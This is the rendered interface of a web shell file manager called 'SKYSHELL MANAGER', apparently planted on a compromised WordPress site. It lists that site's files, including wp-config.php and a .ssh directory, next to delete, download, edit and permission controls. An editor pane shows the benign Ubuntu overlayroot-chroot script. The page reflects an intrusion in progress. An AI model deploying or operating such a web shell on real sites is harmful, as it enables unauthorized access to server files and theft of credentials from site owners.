📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
sites
/
otvetkak.ru
/
Name
Size
Permissions
Actions
📁
antibot
-
0700
🗑️
🔒
📁
tmp
-
0700
🗑️
🔒
📁
..
-
0755
🗑️
🔒
📁
wp-admin
-
0700
🗑️
🔒
📁
media
-
0700
🗑️
🔒
📁
lnkr
-
0700
🗑️
🔒
📁
lib
-
0700
🗑️
🔒
📁
landing
-
0700
🗑️
🔒
📁
image
-
0700
🗑️
🔒
📁
wp-content
-
0700
🗑️
🔒
📁
banners
-
0700
🗑️
🔒
📁
wp-includes
-
0700
🗑️
🔒
📁
ajax
-
0700
🗑️
🔒
📁
.cache
-
0700
🗑️
🔒
📁
.git
-
0700
🗑️
🔒
📁
.ssh
-
0700
🗑️
🔒
📄
wp-config.php
5.48 KB
0600
🗑️
⬇️
✏️
🔒
📄
sitemap.xml
1.75 KB
0700
🗑️
⬇️
✏️
🔒
📄
test_seowork.php
0.15 KB
0700
🗑️
⬇️
✏️
🔒
📄
wmail_09c465d87d3c161979df26f9829ccd42.html
0.16 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-trackback.php
4.77 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-signup.php
33.54 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-settings.php
24.41 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-mail.php
8.34 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-register.php
0.33 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-rdf.php
0.22 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-pass.php
0.4 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-cron.php
5.41 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-feed.php
0.24 KB
0700
🗑️
⬇️
✏️
🔒
📄
robots.txt
0.5 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.44 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-login.php
48.17 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-login.php_
28.4 KB
0700
🗑️
⬇️
✏️
🔒
📄
service-worker.js
0.06 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap1.xml
257.69 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap7.xml
13.24 KB
0700
🗑️
⬇️
✏️
🔒
📄
go.php
0.95 KB
0700
🗑️
⬇️
✏️
🔒
📄
.gitignore
1.45 KB
0700
🗑️
⬇️
✏️
🔒
📄
.htaccess
0.19 KB
0644
🗑️
⬇️
✏️
🔒
📄
506da8d1a8ff.html
0 KB
0700
🗑️
⬇️
✏️
🔒
📄
50x.html
1.38 KB
0700
🗑️
⬇️
✏️
🔒
📄
addl-sitemap.xml
0.58 KB
0700
🗑️
⬇️
✏️
🔒
📄
ads.txt
3.67 KB
0700
🗑️
⬇️
✏️
🔒
📄
agreement.php
6.55 KB
0700
🗑️
⬇️
✏️
🔒
📄
category-sitemap.xml
16.45 KB
0700
🗑️
⬇️
✏️
🔒
📄
f4539d9a1d2dddd90b094a1fb2744cbd.html
0.01 KB
0700
🗑️
⬇️
✏️
🔒
📄
fdc43c7197b903c03ce97888.html
0 KB
0700
🗑️
⬇️
✏️
🔒
📄
google11d97dcef8eaeca0.html
0.05 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap6.xml
261.13 KB
0700
🗑️
⬇️
✏️
🔒
📄
google670877162ab878dc.html
0.05 KB
0700
🗑️
⬇️
✏️
🔒
📄
googlecf81da77e01ae41c.html
0.05 KB
0700
🗑️
⬇️
✏️
🔒
📄
live-116cb0fc.txt
0.02 KB
0700
🗑️
⬇️
✏️
🔒
📄
page-sitemap.xml
11.42 KB
0700
🗑️
⬇️
✏️
🔒
📄
password.php
0.85 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap.xml
1556.63 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap2.xml
259.91 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap3.xml
258.74 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap4.xml
258.07 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap5.xml
250.93 KB
0700
🗑️
⬇️
✏️
🔒
📄
yandex_571a37b60f6c38fe.html
0.16 KB
0700
🗑️
⬇️
✏️
🔒
Editing: overlayroot-chroot
#!/bin/sh # # overlayroot-chroot - chroot wrapper script for overlayroot # Copyright (C) 2012 Dustin Kirkland <kirkland@ubuntu.com> # # Authors: Dustin Kirkland <kirkland@ubuntu.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 3 of the License. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. set -e set -f # disable path expansion REMOUNTS="" error() { printf "ERROR: $@\n" 1>&2 } fail() { [ $# -eq 0 ] || error "$@"; exit 1; } info() { printf "INFO: $@\n" 1>&2 } get_lowerdir() { local overlay="" overlay=$(awk \ '$1 == "overlayroot" && $2 == "/" { print $0 }' /proc/mounts) if [ -n "${overlay}" ]; then lowerdir=${overlay##*lowerdir=} lowerdir=${lowerdir%%,*} if mountpoint "${lowerdir}" >/dev/null; then _RET="${lowerdir}" else fail "Unable to find the overlayroot lowerdir" fi else fail "Unable to find an overlayroot filesystem" fi } clean_exit() { local mounts="$1" rc=0 d="" lowerdir="" mp="" for d in ${mounts}; do if mountpoint ${d} >/dev/null; then umount ${d} || rc=1 fi done for mp in $REMOUNTS; do mount -o remount,ro "${mp}" || error "Note that [${mp}] is still mounted read/write" done [ "$2" = "return" ] && return ${rc} || exit ${rc} } # Try to find the overlayroot filesystem get_lowerdir lowerdir=${_RET} recurse_mps=$(awk '$1 ~ /^\/dev\// && $2 ~ starts { print $2 }' \ starts="^$lowerdir/" /proc/mounts) mounts= for d in proc run sys; do if ! mountpoint "${lowerdir}/${d}" >/dev/null; then mount -o bind "/${d}" "${lowerdir}/${d}" || fail "Unable to bind /${d}" mounts="$mounts $lowerdir/$d" trap "clean_exit \"${mounts}\" || true" EXIT HUP INT QUIT TERM fi done # Remount with read/write for mp in "$lowerdir" $recurse_mps; do mount -o remount,rw "${mp}" && REMOUNTS="$mp $REMOUNTS" || fail "Unable to remount [$mp] writable" done info "Chrooting into [${lowerdir}]" chroot ${lowerdir} "$@" # Clean up mounts on exit clean_exit "${mounts}" "return" trap "" EXIT HUP INT QUIT TERM # vi: ts=4 noexpandtab
💾 Save Changes